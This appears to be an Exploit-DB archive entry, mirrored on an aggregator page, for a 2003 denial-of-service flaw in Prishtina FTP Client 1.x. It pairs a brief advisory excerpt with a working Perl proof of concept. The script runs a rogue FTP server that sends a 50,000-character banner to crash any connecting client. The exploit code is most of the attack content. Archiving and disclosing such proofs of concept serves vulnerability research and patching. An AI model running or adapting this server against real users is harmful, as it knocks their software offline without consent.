Lucene search

K
exploitdbDHGROUPEDB-ID:22637
HistoryMay 23, 2003 - 12:00 a.m.

Prishtina FTP Client 1.x - Remote Denial of Service

2003-05-2300:00:00
DHGROUP
www.exploit-db.com
25

AI Score

7.4

Confidence

Low

source: https://www.securityfocus.com/bid/7671/info

Prishtina FTP client is allegedly prone to a denial of service vulnerability. The condition is reportedly triggered when processing FTP server banners of excessive length. As a result, a malicious attacker-controlled server may be used to crash a target users FTP client. 

#!/usr/bin/perl
use IO::Socket;
$host = "localhost";
$port = "21";
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM,
Reuse => 1, Listen => 2) or die "Couldn't create tcp-server.\n";
$data = "A";
$num = "50000";
$buf .= $data x $num;
while ($client = $server->accept()) {
 print "OK";
 print $client "$buf\n";
 close($client);
}

AI Score

7.4

Confidence

Low

Related for EDB-ID:22637